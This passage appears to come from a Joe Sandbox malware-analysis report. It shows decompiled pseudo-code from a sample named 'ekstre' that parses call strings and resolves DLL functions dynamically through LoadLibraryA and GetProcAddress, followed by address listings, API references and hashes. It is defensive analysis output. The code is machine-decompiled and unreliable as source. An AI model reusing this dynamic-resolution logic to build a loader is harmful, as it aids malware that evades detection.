										if( *_t288 != 0x3e) {
											goto L122;
										}
										 *(_t392 + 0x34) = 3;
										goto L125;
									}
									__eflags = _t283 - 0x3a;
									if(_t283 != 0x3a) {
										goto L121;
									}
									goto L117;
								}
								_t341 = _t337 - 1;
								__eflags = _t341;
								if(_t341 == 0) {
									_t313 =  *(_t392 + 0x30);
									L49:
									_t291 = _t241 + 0xffffffde;
									__eflags = _t291 - 0x55;
									if(_t291 > 0x55) {
										goto L129;
									}
									_t76 = _t291 + 0x6de82b1c; // 0x6de8402c
									switch( *((intOrPtr*)(( *_t76 & 0x000000ff) * 4 +  &M6DE82A94))) {
										case 0:
											__esi =  *(__esp + 0x14);
											__ecx =  *(__esp + 0x14);
											__dl =  *((intOrPtr*)(__esp + 0x13));
											while(1) {
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												L86:
												__eflags =  *(__ebp + 1) - __dl;
												if( *(__ebp + 1) != __dl) {
													L91:
													 *__ecx = 0;
													__esi = E6DE812AF(__esi);
													goto L92;
												}
												L87:
												__eflags = __al;
												if(__al == 0) {
													goto L91;
												}
												__eflags = __al - __dl;
												if(__al == __dl) {
													__ebp = __ebp + 1;
													__eflags = __ebp;
												}
												__al =  *__ebp;
												 *__ecx =  *__ebp;
												__ecx = __ecx + 1;
												__ebp = __ebp + 1;
												__al =  *__ebp;
												__eflags = __al - __dl;
												if(__al != __dl) {
													goto L87;
												}
												goto L86;
											}
										case 1:
											L46:
											 *(_t392 + 0x18) = 1;
											goto L129;
										case 2:
											 *(__esp + 0x18) =  *(__esp + 0x18) | 0xffffffff;
											goto L129;
										case 3:
											 *(__esp + 0x18) =  *(__esp + 0x18) & 0;
											__eax = 0;
											 *(__esp + 0x20) =  *(__esp + 0x20) & 0;
											__ebx = __ebx + 1;
											__eax = 1;
											 *(__esp + 0x30) = __ebx;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											goto L129;
										case 4:
											__eflags =  *(__esp + 0x20);
											if( *(__esp + 0x20) != 0) {
												goto L129;
											}
											 *(__esp + 0x24) = __ebp;
											__esi = E6DE812C6();
											__eax = __esp + 0x24;
											_push(__esi);
											__eax = E6DE81B4C(__eax);
											_push(__edx);
											_push(__eax);
											__eax = E6DE8144D(__ecx);
											__esp = __esp + 0xc;
											goto L80;
										case 5:
											 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
											goto L129;
										case 6:
											_push(7);
											goto L74;
										case 7:
											_push(0x19);
											goto L101;
										case 8:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L58;
										case 9:
											_push(0x15);
											goto L101;
										case 0xa:
											_push(0x16);
											goto L101;
										case 0xb:
											_push(0x18);
											goto L101;
										case 0xc:
											__eax = 0;
											__eflags = 0;
											_t103 = __eax + 1; // 0x1
											__edx = _t103;
											goto L69;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L61;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__edx = 1;
											goto L75;
										case 0xf:
											__eax = 0;
											__eflags = 0;
											_t105 = __eax + 1; // 0x1
											__edx = _t105;
											goto L73;
										case 0x10:
											__eax = 0;
											__eflags = 0;
											_t100 = __eax + 1; // 0x1
											__edx = _t100;
											goto L65;
										case 0x11:
											_push(3);
											goto L74;
										case 0x12:
											_push(0x17);
											L101:
											_pop(__esi);
											goto L102;
										case 0x13:
											__eax = __esp + 0x24;
											__eax = E6DE81B4C(__esp + 0x24);
											_push(0xb);
											_pop(__esi);
											_t134 = __eax + 1; // 0x1
											__ecx = _t134;
											__eflags = _t134 - __esi;
											_push(1);
											_pop(__ecx);
											__esi =  >=  ? _t134 : __esi;
											__esi = __eax + __esi;
											__eflags = __esi;
											L80:
											__ebp =  *(__esp + 0x24);
											goto L93;
										case 0x14:
											__esi = __esi | 0xffffffff;
											goto L102;
										case 0x15:
											 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 1;
											_push(3);
											goto L74;
										case 0x16:
											__eax = 0;
											goto L75;
										case 0x17:
											__eax = 0;
											__eflags = 0;
											_t104 = __eax + 1; // 0x1
											__edx = _t104;
											goto L71;
										case 0x18:
											_t342 =  *(_t382 + 0x814);
											__eflags = _t342 - _t313;
											_push(1);
											_t294 =  <=  ? _t313 : _t342;
											 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0;
											 *(_t392 + 0x24) =  *(_t392 + 0x24) & 0;
											_t314 =  <=  ? _t313 : _t342;
											__eflags =  *(_t392 + 0x38) - 3;
											 *(_t392 + 0x34) =  <=  ? _t313 : _t342;
											__eflags = _t342 - (0 |  *(_t392 + 0x38) == 0x00000003);
											_pop(_t297);
											_t374 =  !=  ? _t297 :  *(_t392 + 0x30);
											 *(_t392 + 0x2c) =  !=  ? _t297 :  *(_t392 + 0x30);
											goto L129;
										case 0x19:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L58:
											_push(2);
											_pop(__ecx);
											 *(__esp + 0x18) = __ecx;
											goto L75;
										case 0x1a:
											L69:
											_push(5);
											goto L74;
										case 0x1b:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L61:
											_push(3);
											_pop(__esi);
											 *(__esp + 0x18) = __esi;
											goto L75;
										case 0x1c:
											__eax = 0;
											__eax = 1;
											goto L75;
										case 0x1d:
											L73:
											_push(6);
											goto L74;
										case 0x1e:
											L65:
											_push(2);
											goto L74;
										case 0x1f:
											__eax = __esp + 0x24;
											__eax = E6DE81B4C(__esp + 0x24);
											__ebp =  *(__esp + 0x28);
											_t138 = __eax + 1; // 0x1
											__esi = _t138;
											L92:
											_pop(__ecx);
											L93:
											__eflags = __esi;
											if(__esi == 0) {
												goto L129;
											}
											L102:
											__ecx =  *(__esp + 0x20);
											0 = 1;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 1;
												if(__ecx == 1) {
													__eax = __ebx;
													__eax = __ebx << 5;
													__eflags = __eax;
													 *(__eax + __edi + 0x82c) = __esi;
												}
												L109:
												 *(__esp + 0x20) = __ecx;
												goto L129;
											}
											__ebx = __ebx << 5;
											__eax =  *(__ebx + __edi + 0x830);
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L105:
												__eax = GlobalFree(__eax);
												__ecx =  *(__esp + 0x20);
												L106:
												 *(__ebx + __edi + 0x830) = __esi;
												goto L109;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L106;
											}
											goto L105;
										case 0x20:
											L71:
											_push(4);
											L74:
											_pop(__eax);
											L75:
											__ecx =  *(0x6de84090 + __eax * 4);
											__esi = __ebx;
											__esi = __ebx << 5;
											__edx =  ~__edx;
											_push(1);
											asm("sbb edx, edx");
											 *(__esp + 0x30) = 1;
											__edx = __edx & 0x00008000;
											__edx = __edx | __eax;
											0 = 1;
											 *(__esi + __edi + 0x818) = __edx;
											__edx =  *(__esp + 0x1c);
											__eflags = __ecx;
											__eax =  >  ? __ecx : 1;
											__eflags = __edx;
											_pop(__ecx);
											__eax =  <  ? __ecx :  >  ? __ecx : 1;
											 *((intOrPtr*)(__esi + __edi + 0x828)) =  <  ? __ecx :  >  ? __ecx : 1;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__eax = __esp + 0x24;
												__eax = E6DE81B4C(__esp + 0x24);
												__ebp =  *(__esp + 0x28);
												_t116 = __eax + 1; // 0x1
												__edx = _t116;
												 *(__esp + 0x18) = __edx;
											}
											 *(__esi + __edi + 0x830) =  *(__esi + __edi + 0x830) & 0x00000000;
											__ecx = __ebx + 0x41;
											__ecx = __ebx + 0x41 << 5;
											 *(__esi + __edi + 0x81c) = __edx;
											 *((__ebx + 0x41 << 5) + __edi) =  *((__ebx + 0x41 << 5) + __edi) & 0x00000000;
											 *(__esi + __edi + 0x82c) =  *(__esi + __edi + 0x82c) & 0x00000000;
											goto L129;
										case 0x21:
											goto L129;
									}
								}
								_t343 = _t341 - 1;
								__eflags = _t343;
								if(_t343 == 0) {
									_t313 = 0;
									 *(_t392 + 0x30) = 0;
									goto L49;
								}
								__eflags = _t343 != 1;
								if(_t343 != 1) {
									goto L121;
								}
								__eflags = _t241 - 0x6e;
								if(__eflags > 0) {
									_t298 = _t241 - 0x72;
									__eflags = _t298;
									if(_t298 == 0) {
										_push(4);
										L41:
										_pop(_t299);
										L42:
										_t345 =  *(_t382 + 0x810);
										__eflags =  *(_t392 + 0x18) - 1;
										if( *(_t392 + 0x18) != 1) {
											_t346 = _t345 &  !_t299;
											__eflags = _t346;
										} else {
											_t346 = _t345 | _t299;
										}
										 *(_t382 + 0x810) = _t346;
										goto L46;
									}
									_t303 = _t298 - 1;
									__eflags = _t303;
									if(_t303 == 0) {
										_push(0x10);
										goto L41;
									}
									_t347 = 2;
									__eflags = _t303 != _t347;
									if(_t303 != _t347) {
										goto L129;
									}
									_push(0x40);
									goto L41;
								}
								if(__eflags == 0) {
									_push(8);
									goto L41;
								}
								_t305 = _t241 - 0x21;
								__eflags = _t305;
								if(_t305 == 0) {
									 *(_t392 + 0x18) =  ~( *(_t392 + 0x18));
									goto L129;
								}
								_t306 = _t305 - 0x11;
								__eflags = _t306;
								if(_t306 == 0) {
									_t299 = 0x100;
									goto L42;
								}
								_t307 = _t306 - 0x31;
								__eflags = _t307;
								if(_t307 == 0) {
									_t299 = 1;
									goto L42;
								}
								_t348 = 2;
								__eflags = _t307 != _t348;
								if(_t307 != _t348) {
									goto L129;
								} else {
									_push(0x20);
									goto L41;
								}
							}
							 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0x00000000;
							 *(_t392 + 0x34) =  *(_t392 + 0x34) & 0x00000000;
							goto L132;
						}
						__eflags =  *((char*)(_t391 - 1)) - 0x3a;
						if( *((char*)(_t391 - 1)) != 0x3a) {
							goto L29;
						}
						__eflags = _t336;
						if(_t336 == 0) {
							goto L15;
						}
						goto L29;
					}
					_t349 = _t335 - 5;
					if(_t349 == 0) {
						__eflags =  *(_t392 + 0x28);
						if( *(_t392 + 0x28) == 0) {
							 *(_t392 + 0x1c) = 1;
							__eflags =  *(_t392 + 0x34) - 3;
							_t360 = (0 |  *(_t392 + 0x34) == 0x00000003) + 1;
							__eflags = _t360;
							 *(_t392 + 0x30) = _t360;
						}
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						_t377 =  *(_t392 + 0x28);
						__eflags = _t377;
						_t351 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x2c) =  *(_t392 + 0x2c) & 0x00000000;
						__eflags = _t377;
						_t353 =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						 *(_t392 + 0x2c) =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						__eflags = _t377;
						_t355 = 0 | _t377 == 0x00000000;
						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
						__eflags =  *(_t392 + 0x28);
						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
						L13:
						 *(_t392 + 0x20) = _t379;
						_t368 =  *(_t392 + 0x40);
						__eflags = _t355;
						if(_t355 != 0) {
							goto L132;
						}
						L14:
						_t336 =  *(_t392 + 0x1c);
						goto L15;
					}
					_t361 = _t349 - 1;
					if(_t361 == 0) {
						_t380 =  *(_t392 + 0x28);
						__eflags = _t380;
						_t363 =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x1c) =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						__eflags = _t380;
						_t365 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						__eflags = _t380;
						_t355 = 0 | _t380 == 0x00000000;
						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
						__eflags =  *(_t392 + 0x28);
						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
						goto L13;
					}
					if(_t361 != 0x16) {
						goto L14;
					} else {
						 *(_t392 + 0x1c) = 3;
						 *(_t392 + 0x18) = 1;
						goto L132;
					}
				}
				GlobalFree( *(_t392 + 0x44));
				GlobalFree( *(_t392 + 0x14));
				GlobalFree( *(_t392 + 0x38));
				if(_t382 == 0 ||  *(_t382 + 0x80c) != 0) {
					L181:
					return _t382;
				} else {
					_t249 =  *_t382 - 1;
					if(_t249 == 0) {
						_t215 = _t382 + 8; // 0x8
						_t386 = _t215;
						__eflags =  *_t386;
						if( *_t386 != 0) {
							_t250 = GetModuleHandleA(_t386);
							 *(_t382 + 0x808) = _t250;
							__eflags = _t250;
							if(_t250 != 0) {
								L169:
								_t220 = _t382 + 0x408; // 0x408
								_t387 = _t220;
								_t251 = E6DE81ECE(_t250, _t387);
								 *(_t382 + 0x80c) = _t251;
								__eflags = _t251;
								if(_t251 == 0) {
									__eflags =  *_t387 - 0x23;
									if( *_t387 == 0x23) {
										_t222 = _t382 + 0x409; // 0x409
										_t255 = E6DE81326();
										__eflags = _t255;
										if(_t255 != 0) {
											__eflags = _t255 & 0xffff0000;
											if((_t255 & 0xffff0000) == 0) {
												 *(_t382 + 0x80c) = GetProcAddress( *(_t382 + 0x808), _t255 & 0x0000ffff);
											}
										}
									}
								}
								__eflags =  *(_t392 + 0x3c);
								if( *(_t392 + 0x3c) != 0) {
									L176:
									_t252 = lstrlenA(_t387);
									_t323 = 0x41;
									_t387[_t252] = _t323;
									_t253 = E6DE81ECE( *(_t382 + 0x808), _t387);
									__eflags = _t253;
									if(_t253 == 0) {
										__eflags =  *(_t382 + 0x80c);
										L179:
										if(__eflags != 0) {
											goto L181;
										}
										L180:
										_t233 = _t382 + 4;
										 *_t233 =  *(_t382 + 4) | 0xffffffff;
										__eflags =  *_t233;
										goto L181;
									}
									L177:
									 *(_t382 + 0x80c) = _t253;
									goto L181;
								} else {
									__eflags =  *(_t382 + 0x80c);
									if( *(_t382 + 0x80c) != 0) {
										goto L181;
									}
									goto L176;
								}
							}
							_t250 = LoadLibraryA(_t386);
							 *(_t382 + 0x808) = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								goto L180;
							}
							goto L169;
						}
						_t216 = _t382 + 0x408; // 0x408
						_t259 = E6DE81326();
						 *(_t382 + 0x80c) = _t259;
						__eflags = _t259;
						goto L179;
					}
					_t260 = _t249 - 1;
					if(_t260 == 0) {
						_t214 = _t382 + 0x408; // 0x408
						_t261 = _t214;
						__eflags =  *_t261;
						if( *_t261 == 0) {
							goto L181;
						}
						_push(_t261);
						_t253 = E6DE81326();
						goto L177;
					}
					if(_t260 != 1) {
						goto L181;
					}
					_t202 = _t382 + 8; // 0x8
					_t317 = _t202;
					_push(_t202);
					_t388 = E6DE81326();
					 *(_t382 + 0x808) = _t388;
					if(_t388 == 0) {
						goto L180;
					}
					 *(_t382 + 0x84c) =  *(_t382 + 0x84c) & 0x00000000;
					_t264 = E6DE812AF(_t317);
					 *(_t382 + 0x83c) =  *(_t382 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t382 + 0x850)) = _t264;
					 *((intOrPtr*)(_t382 + 0x848)) = 1;
					 *((intOrPtr*)(_t382 + 0x838)) = 1;
					_t211 = _t382 + 0x408; // 0x408
					_t253 =  *(_t388->i + E6DE81326() * 4);
					goto L177;
				}
			}

0x6de82291
0x6de82295
0x6de82297
0x6de8229b
0x6de8229f
0x6de822a3
0x6de822a7
0x6de822ab
0x6de822af
0x6de822b4
0x6de822b8
0x6de822bf
0x6de822c3
0x6de822c8
0x6de822ca
0x6de822ce
0x6de822d0
0x6de822d4
0x6de822dc
0x6de822de
0x6de822de
0x6de822e0
0x6de822e6
0x00000000
0x00000000
0x6de822f0
0x6de822f3
0x6de822f7
0x6de822fc
0x6de822ff
0x6de827e3
0x6de827e3
0x6de827e3
0x6de827e8
0x6de827e8
0x6de827eb
0x6de8280c
0x6de8280e
0x6de82810
0x6de82812
0x6de82821
0x6de82823
0x6de82823
0x6de82825
0x6de8282b
0x6de8282b
0x6de82831
0x6de82835
0x6de82835
0x6de82838
0x6de82838
0x6de8283e
0x6de82840
0x6de82842
0x6de82844
0x6de8284a
0x6de82850
0x6de82853
0x6de82853
0x6de82855
0x6de8287e
0x6de82882
0x00000000
0x00000000
0x6de82885
0x6de82887
0x6de8288d
0x6de82896
0x6de82899
0x6de8289b
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8289d
0x6de8289d
0x6de8289d
0x6de828a3
0x6de828a5
0x00000000
0x00000000
0x6de828a7
0x6de828a9
0x6de828a9
0x6de828ad
0x6de828af
0x6de828b1
0x6de828b1
0x6de828b1
0x6de828b1
0x6de828b8
0x6de828be
0x6de828c0
0x6de828d6
0x6de828d7
0x6de828d7
0x6de828d9
0x6de828c2
0x6de828c8
0x6de828cb
0x6de828cb
0x00000000
0x6de82857
0x6de82857
0x6de82857
0x6de8285a
0x6de82866
0x6de8286b
0x6de82871
0x6de82876
0x6de828df
0x6de828df
0x6de828e3
0x6de828e3
0x6de828e7
0x6de828e8
0x6de828ec
0x6de828f1
0x00000000
0x00000000
0x00000000
0x6de828f1
0x6de8285c
0x6de8285c
0x6de8285f
0x00000000
0x00000000
0x6de82861
0x6de82864
0x00000000
0x00000000
0x00000000
0x6de82864
0x6de82855
0x6de827ed
0x6de827f0
0x6de827f6
0x6de827fe
0x6de82800
0x6de82800
0x6de82801
0x6de82801
0x00000000
0x6de827f0
0x6de82305
0x6de82308
0x6de82438
0x6de8243c
0x6de82440
0x6de8244c
0x6de8244c
0x6de82451
0x6de823ef
0x6de823ef
0x6de823ef
0x6de823f2
0x6de82746
0x6de8275e
0x6de8275e
0x6de82760
0x00000000
0x00000000
0x6de8274c
0x6de8274d
0x6de82752
0x6de82754
0x6de8278a
0x6de8278b
0x6de8278f
0x6de82792
0x6de82794
0x00000000
0x6de82794
0x6de82756
0x6de82756
0x6de82756
0x6de8275b
0x6de8275b
0x6de82762
0x6de82764
0x6de827d3
0x6de827d4
0x6de827d8
0x6de827d8
0x6de827dc
0x6de827dc
0x00000000
0x6de827dc
0x6de82766
0x6de82768
0x6de8276e
0x6de8276e
0x6de82771
0x6de82774
0x6de8279a
0x6de8279a
0x6de8279a
0x6de8279d
0x6de827a0
0x00000000
0x00000000
0x6de827a2
0x6de827a5
0x00000000
0x00000000
0x6de827a9
0x6de827aa
0x6de827ae
0x6de827ae
0x6de827b2
0x6de827b4
0x6de827b6
0x6de827cc
0x6de827b8
0x6de827bd
0x6de827c0
0x6de827c0
0x00000000
0x6de827b6
0x6de82776
0x6de82776
0x6de82779
0x6de8277c
0x00000000
0x00000000
0x6de8277e
0x00000000
0x6de8277e
0x6de8276a
0x6de8276c
0x00000000
0x00000000
0x00000000
0x6de8276c
0x6de823f8
0x6de823f8
0x6de823fb
0x6de824cc
0x6de824d0
0x6de824d0
0x6de824d5
0x6de824d8
0x00000000
0x00000000
0x6de824de
0x6de824e5
0x00000000
0x6de8269f
0x6de826a3
0x6de826a5
0x6de826a9
0x6de826a9
0x6de826aa
0x6de826ad
0x6de826af
0x00000000
0x00000000
0x6de826b1
0x6de826b1
0x6de826b4
0x6de826c7
0x6de826c8
0x6de826d0
0x00000000
0x6de826d0
0x6de826b6
0x6de826b6
0x6de826b8
0x00000000
0x00000000
0x6de826ba
0x6de826bc
0x6de826be
0x6de826be
0x6de826be
0x6de826bf
0x6de826c2
0x6de826c4
0x6de826a9
0x6de826aa
0x6de826ad
0x6de826af
0x00000000
0x00000000
0x00000000
0x6de826af
0x00000000
0x6de824b8
0x6de824bb
0x00000000
0x00000000
0x6de8253f
0x00000000
0x00000000
0x6de82526
0x6de8252a
0x6de8252c
0x6de82530
0x6de82531
0x6de82532
0x6de82536
0x00000000
0x00000000
0x6de82671
0x6de82675
0x00000000
0x00000000
0x6de8267c
0x6de82685
0x6de82687
0x6de8268b
0x6de8268d
0x6de82693
0x6de82694
0x6de82695
0x6de8269a
0x00000000
0x00000000
0x6de82634
0x00000000
0x00000000
0x6de82549
0x00000000
0x00000000
0x6de826f2
0x00000000
0x00000000
0x6de82551
0x6de82553
0x6de82554
0x00000000
0x00000000
0x6de826e2
0x00000000
0x00000000
0x6de826e6
0x00000000
0x00000000
0x6de826ee
0x00000000
0x00000000
0x6de82598
0x6de82598
0x6de8259a
0x6de8259a
0x00000000
0x00000000
0x6de82564
0x6de82566
0x6de82567
0x00000000
0x00000000
0x6de82577
0x6de82579
0x6de8257a
0x00000000
0x00000000
0x6de825aa
0x6de825aa
0x6de825ac
0x6de825ac
0x00000000
0x00000000
0x6de82583
0x6de82583
0x6de82585
0x6de82585
0x00000000
0x00000000
0x6de8258c
0x00000000
0x00000000
0x6de826ea
0x6de826f4
0x6de826f4
0x00000000
0x00000000
0x6de8263d
0x6de82642
0x6de82648
0x6de8264a
0x6de8264b
0x6de8264b
0x6de8264e
0x6de82650
0x6de82652
0x6de82653
0x6de82656
0x6de82656
0x6de82658
0x6de82658
0x00000000
0x00000000
0x6de826dd
0x00000000
0x00000000
0x6de82590
0x6de82594
0x00000000
0x00000000
0x6de8254d
0x00000000
0x00000000
0x6de825a1
0x6de825a1
0x6de825a3
0x6de825a3
0x00000000
0x00000000
0x6de824ec
0x6de824f4
0x6de824f6
0x6de824f8
0x6de824fb
0x6de824ff
0x6de82503
0x6de8250b
0x6de82510
0x6de82517
0x6de82519
0x6de8251a
0x6de8251d
0x00000000
0x00000000
0x6de82558
0x6de8255a
0x6de8255a
0x6de8255b
0x6de8255b
0x6de8255d
0x6de8255e
0x00000000
0x00000000
0x6de8259d
0x6de8259d
0x00000000
0x00000000
0x6de8256b
0x6de8256d
0x6de8256d
0x6de8256e
0x6de8256e
0x6de82570
0x6de82571
0x00000000
0x00000000
0x6de8257e
0x6de82580
0x00000000
0x00000000
0x6de825af
0x6de825af
0x00000000
0x00000000
0x6de82588
0x6de82588
0x00000000
0x00000000
0x6de8265e
0x6de82663
0x6de82668
0x6de8266c
0x6de8266c
0x6de826d2
0x6de826d2
0x6de826d3
0x6de826d3
0x6de826d5
0x00000000
0x00000000
0x6de826f5
0x6de826f5
0x6de826fb
0x6de826fc
0x6de82700
0x6de82702
0x6de8272c
0x6de8272e
0x6de82730
0x6de82732
0x6de82732
0x6de82735
0x6de82735
0x6de8273c
0x6de8273d
0x00000000
0x6de8273d
0x6de82704
0x6de82707
0x6de8270e
0x6de82711
0x6de82718
0x6de82719
0x6de8271f
0x6de82723
0x6de82723
0x00000000
0x6de82723
0x6de82713
0x6de82716
0x00000000
0x00000000
0x00000000
0x00000000
0x6de825a6
0x6de825a6
0x6de825b1
0x6de825b1
0x6de825b2
0x6de825b2
0x6de825b9
0x6de825bb
0x6de825be
0x6de825c0
0x6de825c2
0x6de825c4
0x6de825cc
0x6de825d2
0x6de825d6
0x6de825d7
0x6de825de
0x6de825e2
0x6de825e4
0x6de825e7
0x6de825e9
0x6de825ea
0x6de825ed
0x6de825f4
0x6de825f6
0x6de825f8
0x6de825fd
0x6de82602
0x6de82607
0x6de82607
0x6de8260a
0x6de8260a
0x6de8260e
0x6de82616
0x6de82619
0x6de8261c
0x6de82623
0x6de82627
0x00000000
0x00000000
0x00000000
0x00000000
0x6de824e5
0x6de82401
0x6de82401
0x6de82404
0x6de824c4
0x6de824c6
0x00000000
0x6de824c6
0x6de8240a
0x6de8240d
0x00000000
0x00000000
0x6de82413
0x6de82416
0x6de8247b
0x6de8247b
0x6de8247e
0x6de82498
0x6de8249a
0x6de8249a
0x6de8249b
0x6de8249b
0x6de824a4
0x6de824a8
0x6de824b0
0x6de824b0
0x6de824aa
0x6de824aa
0x6de824aa
0x6de824b2
0x00000000
0x6de824b2
0x6de82480
0x6de82480
0x6de82483
0x6de82494
0x00000000
0x6de82494
0x6de82487
0x6de82488
0x6de8248a
0x00000000
0x00000000
0x6de82490
0x00000000
0x6de82490
0x6de82418
0x6de82477
0x00000000
0x6de82477
0x6de8241a
0x6de8241a
0x6de8241d
0x6de8246e
0x00000000
0x6de8246e
0x6de8241f
0x6de8241f
0x6de82422
0x6de82467
0x00000000
0x6de82467
0x6de82424
0x6de82424
0x6de82427
0x6de82464
0x00000000
0x6de82464
0x6de8242b
0x6de8242c
0x6de8242e
0x00000000
0x6de82434
0x6de82434
0x00000000
0x6de82434
0x6de8242e
0x6de82453
0x6de82458
0x00000000
0x6de82458
0x6de82442
0x6de82446
0x00000000
0x00000000
0x6de82448
0x6de8244a
0x00000000
0x00000000
0x00000000
0x6de8244a
0x6de8230e
0x6de82311
0x6de82378
0x6de8237d
0x6de82382
0x6de82388
0x6de82390
0x6de82390
0x6de82391
0x6de82391
0x6de82399
0x6de8239e
0x6de823a2
0x6de823a4
0x6de823a9
0x6de823b1
0x6de823b6
0x6de823b8
0x6de823bd
0x6de823c3
0x6de823c9
0x6de823cc
0x6de823d1
0x6de823d6
0x6de823db
0x6de823db
0x6de823df
0x6de823e3
0x6de823e5
0x00000000
0x00000000
0x6de823eb
0x6de823eb
0x00000000
0x6de823eb
0x6de82313
0x6de82316
0x6de82335
0x6de82339
0x6de8233f
0x6de82344
0x6de8234c
0x6de82351
0x6de82353
0x6de82358
0x6de8235e
0x6de82364
0x6de82367
0x6de8236c
0x6de82371
0x00000000
0x6de82371
0x6de8231b
0x00000000
0x6de82321
0x6de82323
0x6de8232c
0x00000000
0x6de8232c
0x6de8231b
0x6de82901
0x6de82907
0x6de8290d
0x6de82911
0x6de82a8a
0x6de82a93
0x6de82925
0x6de82927
0x6de8292a
0x6de829b5
0x6de829b5
0x6de829b8
0x6de829ba
0x6de829d7
0x6de829dd
0x6de829e3
0x6de829e5
0x6de829fc
0x6de829fc
0x6de829fc
0x6de82a04
0x6de82a09
0x6de82a11
0x6de82a13
0x6de82a15
0x6de82a18
0x6de82a1a
0x6de82a21
0x6de82a27
0x6de82a29
0x6de82a2b
0x6de82a30
0x6de82a42
0x6de82a42
0x6de82a30
0x6de82a29
0x6de82a18
0x6de82a48
0x6de82a4c
0x6de82a56
0x6de82a57
0x6de82a5f
0x6de82a61
0x6de82a6b
0x6de82a72
0x6de82a74
0x6de82a7e
0x6de82a84
0x6de82a84
0x00000000
0x00000000
0x6de82a86
0x6de82a86
0x6de82a86
0x6de82a86
0x00000000
0x6de82a86
0x6de82a76
0x6de82a76
0x00000000
0x6de82a4e
0x6de82a4e
0x6de82a54
0x00000000
0x00000000
0x00000000
0x6de82a54
0x6de82a4c
0x6de829e8
0x6de829ee
0x6de829f4
0x6de829f6
0x00000000
0x00000000
0x00000000
0x6de829f6
0x6de829bc
0x6de829c3
0x6de829c9
0x6de829cf
0x00000000
0x6de829cf
0x6de82930
0x6de82933
0x6de8299b
0x6de8299b
0x6de829a1
0x6de829a3
0x00000000
0x00000000
0x6de829a9
0x6de829aa
0x00000000
0x6de829af
0x6de82938
0x00000000
0x00000000
0x6de8293e
0x6de8293e
0x6de82941
0x6de82947
0x6de82949
0x6de82952
0x00000000
0x00000000
0x6de82958
0x6de82960
0x6de82965
0x6de8296c
0x6de82975
0x6de8297b
0x6de82981
0x6de82994
0x00000000
0x6de82994

APIs

Part of subcall function 6DE812C6: GlobalAlloc.KERNELBASE(00000040,6DE811C4,-000000A0), ref: 6DE812CE

lstrcpyA.KERNEL32(?,?), ref: 6DE827C0
GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6DE8281B
lstrcpyA.KERNEL32(00000008,?), ref: 6DE8286B
lstrcpyA.KERNEL32(00000408,?), ref: 6DE82876
GlobalFree.KERNEL32(00000000), ref: 6DE82887
GlobalFree.KERNEL32(?), ref: 6DE82901
GlobalFree.KERNEL32(?), ref: 6DE82907
GlobalFree.KERNEL32(?), ref: 6DE8290D
GetModuleHandleA.KERNEL32(00000008), ref: 6DE829D7
LoadLibraryA.KERNEL32(00000008), ref: 6DE829E8
GetProcAddress.KERNEL32(?,?), ref: 6DE82A3C
lstrlenA.KERNEL32(00000408), ref: 6DE82A57

Strings

:, xrefs: 6DE82442

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID: :
API String ID: 245916457-336475711
Opcode ID: 4efdd93c2530830047b8e74ee0f7e56131e326f73c21a290b52b152a97b8613b
Instruction ID: 1e26377b908982eba2a5f2e2cc6da48c5c4bf4ede7bbe564e9465431b4523427
Opcode Fuzzy Hash: 4efdd93c2530830047b8e74ee0f7e56131e326f73c21a290b52b152a97b8613b
Instruction Fuzzy Hash: 003207719587029FD725CF38C44076AB7E0BF9A318F60862DE4ADE3292DF30C5468B92

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E9D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
